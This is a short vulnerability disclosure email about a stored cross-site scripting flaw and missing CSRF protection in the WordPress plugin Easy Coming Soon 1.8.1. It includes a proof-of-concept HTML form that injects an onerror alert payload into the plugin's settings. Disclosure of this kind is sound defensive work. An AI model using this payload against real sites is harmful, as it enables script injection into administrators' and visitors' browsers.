Subject: Persistent Cross-Site Scripting (XSS) in Easy Coming Soon 1.8.1

Date: Mon, 24 Aug 2015 15:08:31 +0200

Hello,

Plugin: Easy Coming Soon 1.8.1 https://wordpress.org/plugins/easy-coming-soon/

1. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store html/js code in plugin configuration values (there is no CSRF protection!).

Method: POST

Url: http://localhost/wp-admin/admin.php?page=coming_soon

Vulnerable parameters: background_color, title_color, title_font_format, etc...

Example PHP callstack:

easy-coming-soon/theme_options/pages/design_page_settings.php:74

Verification:

--

<form method="POST" action="http://localhost/wp-admin/admin.php?page=coming_soon" />

<input type="text" name="commingsoon_lite_settings_save_2" value="1" />

<input type="text" name="background_color" value='"><img src=x onerror=alert(1) />' />

<input type="submit" />

</form>

--

--

Regards,
Marcin Probola,